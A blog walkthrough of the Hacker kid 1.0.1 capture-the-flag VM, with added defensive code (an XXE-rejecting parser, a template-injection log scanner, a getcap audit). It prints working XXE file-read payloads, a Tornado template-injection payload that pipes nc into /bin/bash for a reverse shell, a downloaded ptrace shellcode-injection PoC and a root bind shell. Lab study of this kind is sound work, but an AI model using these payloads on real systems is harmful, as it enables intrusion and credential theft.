Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Hacker kid: 1.0.1 Walkthrough

https://www.vulnhub.com/entry/hacker-kid-101,719/

Very good machine, learned some new stuff.

Scan all ports; port 53 (DNS) is the interesting one.

 nmap -sV -sC -p- 192.168.33.144  -oN ports.log        
 ...
 PORT     STATE SERVICE VERSION
 53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
 | dns-nsid:
 |_  bind.version: 9.16.1-Ubuntu
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 |_http-server-header: Apache/2.4.41 (Ubuntu)
 |_http-title: Notorious Kid : A Hacker
 9999/tcp open  http    Tornado httpd 6.1
 |_http-server-header: TornadoServer/6.1
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Directory scan on port 80 with gobuster.

 ~ gobuster dir -u http://192.168.33.144 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
 ...
 ===============================================================
 /images               (Status: 301) [Size: 317] [--> http://192.168.33.144/images/]
 /index.php            (Status: 200) [Size: 3597]                                    
 /css                  (Status: 301) [Size: 314] [--> http://192.168.33.144/css/]  
 /form.html            (Status: 200) [Size: 10219]                                  
 /app.html             (Status: 200) [Size: 8048]                                    
 /javascript           (Status: 301) [Size: 321] [--> http://192.168.33.144/javascript/]


Found a hint in an HTML comment in the index.php source.

 <div class="container py-5">
   <h1>Thanks</h1>
 
  TO DO: Use a GET parameter page_no  to view pages.
 -->


Fuzz the page_no parameter of index.php, hiding the default 3654-character response.

 ~ seq 1 100 > dic.txt
 ~ wfuzz -u 'http://192.168.33.144/index.php?page_no=FUZZ'    -w dic.txt --hh 3654
 ...
 =====================================================================                                  
 000000021:   200        116 L    310 W      3849 Ch     "21"


Get more info with page_no=21.

 ~ curl 'http://192.168.33.144/index.php?page_no=21'
 <center>
         <font color="red">
 
 Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
 <font color="red">
 </center>


Dig the hinted domain; the SOA record reveals another hostname, hackerkid.blackhat.local. Write it into /etc/hosts.

 ~ dig @192.168.33.144 hackers.blackhat.local
 ...
 ;; AUTHORITY SECTION:
 blackhat.local.         3600    IN      SOA     blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600
 ...


Visit hackerkid.blackhat.local. Its process.php accepts XML and is vulnerable to XXE (XML External Entity) injection; reading /etc/passwd reveals the user saket.

 ~ curl 'http://hackerkid.blackhat.local/process.php' -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
 ...
 saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
 systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
 bind:x:126:133::/var/cache/bind:/usr/sbin/nologin


Read saket's .bashrc through the php://filter wrapper, base64-encoded so the file contents do not break the XML.

 ~ curl 'http://hackerkid.blackhat.local/process.php' -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/home/saket/.bashrc">]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
 ...
 Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
 IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!

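How process.php should have handled that XML, as an added example (my own code, not the VM's process.php): reject any DOCTYPE before parsing, so neither the file:// nor the php://filter entity can be declared, then extract the four form fields. The XXE body below is a constructed copy of the payload used above, re-quoted for XML.

```python
"""Hardened XML intake for a form like the one process.php accepts."""
import xml.parsers.expat

FIELDS = ("name", "tel", "email", "password")

# Constructed sample bodies: the XXE payload from this post, and a benign one.
XXE_BODY = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            '<root><name></name><tel></tel><email>&xxe;</email><password></password></root>')
BENIGN_BODY = ('<root><name>saket</name><tel>123</tel>'
               '<email>saket@blackhat.local</email><password>x</password></root>')


class UnsafeXML(ValueError):
    """The document tried to declare a DTD (and therefore entities)."""


def parse_contact_form(body):
    """Return {field: text}; raise UnsafeXML on a DOCTYPE, ExpatError on bad XML."""
    parser = xml.parsers.expat.ParserCreate()
    result = {f: "" for f in FIELDS}
    stack = []  # element names currently open

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        # Fires on '<!DOCTYPE ...' before any entity can be declared or used.
        raise UnsafeXML("DOCTYPE %r not allowed" % name)

    def chars(data):
        if stack and stack[-1] in result:
            result[stack[-1]] += data  # expat may deliver text in chunks

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = chars
    # Belt and braces: never resolve parameter entities even if a DTD got through.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(body, True)
    return result


def classify(body):
    """('ok', fields) or ('rejected', reason): what a request handler branches on."""
    try:
        return "ok", parse_contact_form(body)
    except UnsafeXML as exc:
        return "rejected", str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return "rejected", "malformed XML: %s" % exc
```

A bare `&xxe;` with no DOCTYPE is also rejected, as an undefined entity, so the parser never sees a usable entity either way.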

Decoding the base64 gives the password for the app on port 9999, but the login that works is with the username "saket", not "admin".

 #Setting Password for running python app
 username="admin"
 password="Saket!#$%@!!"


Log in on port 9999.


The app takes a "name" parameter and reflects it in the page, which suggests server-side template injection in the Tornado app.


Enter a Tornado template payload, get a reverse shell through nc, then spawn a full shell.

 {%import os%}{{os.system("nc 192.168.33.128 1234|/bin/bash|nc 192.168.33.128 2234")}}

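Detection for the injection above, as an added example (my own code, not from the post or the VM): Tornado's access logger writes each request as `<status> <method> <uri> (<ip>) <ms>ms`, so the query string is logged and template syntax inside it can be spotted. The log lines are constructed in that shape, with the payload from this post URL-encoded as a browser sends it. The server-side fix is to pass `name` as a template variable instead of compiling it into the template.

```python
"""Spot Tornado template-injection probes in access-log lines."""
import re
from urllib.parse import urlsplit, parse_qs

# Tornado template delimiters; none of these belong in user-supplied data.
TEMPLATE_TOKENS = re.compile(r"\{\{|\{%|%\}|\}\}")

# Constructed sample log in Tornado's access-log shape (one probe, two benign).
SAMPLE_LOG = """\
[I 210906 14:14:18 web:2239] 200 GET /?name=saket (192.168.33.128) 1.02ms
[I 210906 14:15:02 web:2239] 200 GET /?name=%7B%25import%20os%25%7D%7B%7Bos.system%28%22nc%20192.168.33.128%201234%7C%2Fbin%2Fbash%7Cnc%20192.168.33.128%202234%22%29%7D%7D (192.168.33.128) 45.10ms
[I 210906 14:15:40 web:2239] 200 GET /?name=%7Bbob%7D (192.168.33.128) 0.95ms
"""

LINE = re.compile(r"\b(?P<status>\d{3}) (?P<method>[A-Z]+) (?P<uri>\S+) \((?P<ip>[^)]+)\)")


def suspicious_params(uri):
    """Return {param: decoded_value} for query params carrying template syntax."""
    hits = {}
    # parse_qs percent-decodes, so %7B%25 becomes the literal '{%' we look for.
    for key, values in parse_qs(urlsplit(uri).query, keep_blank_values=True).items():
        for value in values:
            if TEMPLATE_TOKENS.search(value):
                hits[key] = value
    return hits


def scan_log(text):
    """Return [(ip, uri, {param: value})] for every line with template syntax."""
    alerts = []
    for line in text.splitlines():
        m = LINE.search(line)
        if not m:
            continue
        hits = suspicious_params(m.group("uri"))
        if hits:
            alerts.append((m.group("ip"), m.group("uri"), hits))
    return alerts


if __name__ == "__main__":
    for ip, uri, hits in scan_log(SAMPLE_LOG):
        print(ip, hits)
```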

Enumerate file capabilities with getcap; python2.7 has cap_sys_ptrace.

 saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
 /usr/bin/python2.7 = cap_sys_ptrace+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/mtr-packet = cap_net_raw+ep
 ...

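An audit check for that listing, as an added example (my own code, not from the post): it parses `getcap -r /` output and flags capabilities that are root-equivalent on their own (cap_sys_ptrace lets a process attach to and rewrite root-owned processes, which is exactly what the ptrace injection in this walkthrough relies on) plus any capability on an interpreter binary. The root-equivalent set is a constructed baseline; the sample output is taken from the listing above.

```python
"""Flag risky file capabilities in getcap output."""
import re

# Constructed baseline of capabilities that are root-equivalent on their own.
ROOT_EQUIVALENT = {
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_setuid",
    "cap_setgid", "cap_dac_override", "cap_dac_read_search", "cap_chown",
}
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node)[\d.]*$")

# Sample getcap output, constructed from the listing in this post.
SAMPLE = """\
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
"""


def parse_getcap(text):
    """Yield (path, {cap, ...}) per line. Accepts the old 'path = caps' format
    and the libcap >= 2.41 'path caps' format; the e/p/i flag letters are
    ignored because any grant at all is worth a look."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        path, _, caps = line.partition(" ")
        names = set()
        for group in caps.lstrip("= ").split():
            # e.g. 'cap_net_raw,cap_net_admin+ep' or 'cap_sys_ptrace=ep'
            for name in re.split(r"[+=]", group, maxsplit=1)[0].split(","):
                if name:
                    names.add(name.lower())
        yield path, names


def audit_getcap(text):
    """Return sorted [(path, reason)] findings."""
    findings = []
    for path, names in parse_getcap(text):
        risky = sorted(names & ROOT_EQUIVALENT)
        if risky:
            findings.append((path, "root-equivalent: " + ",".join(risky)))
        elif INTERPRETER.search(path):
            findings.append((path, "capability on interpreter: " + ",".join(sorted(names))))
    return sorted(findings)
```

The fix for a finding like python2.7 here is `setcap -r /usr/bin/python2.7`; cap_net_raw on ping is normal and is not reported.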

Reference: https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc

Download the PoC from the referenced article and upload it to the target.

 wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py


Choose a process running as root to inject into (apache2, PID 935).

 saket@ubuntu:~$ ps aux|grep root
 ...
 root         935  0.0  0.4 199776 19968 ?        Ss   12:54   0:00 /usr/sbin/apache2 -k start
 ...


Run the PoC against PID 935, then check the listening ports: the injected shellcode opens a bind shell on port 5600.

 saket@ubuntu:~$ python2.7 inject.py 935
 Instruction Pointer: 0x7fd118b560daL
 Injecting Shellcode at: 0x7fd118b560daL
 Shellcode Injected!!
 Final Instruction Pointer: 0x7fd118b560dcL
 saket@ubuntu:~$ ss -tnlp
 State     Recv-Q    Send-Q        Local Address:Port       Peer Address:Port    Process                 ...
 LISTEN    0         0                   0.0.0.0:5600            0.0.0.0:*                                ...


Connect to port 5600 and get a root shell.

 ~ nc 192.168.33.144 5600              
 id
 uid=0(root) gid=0(root) groups=0(root)

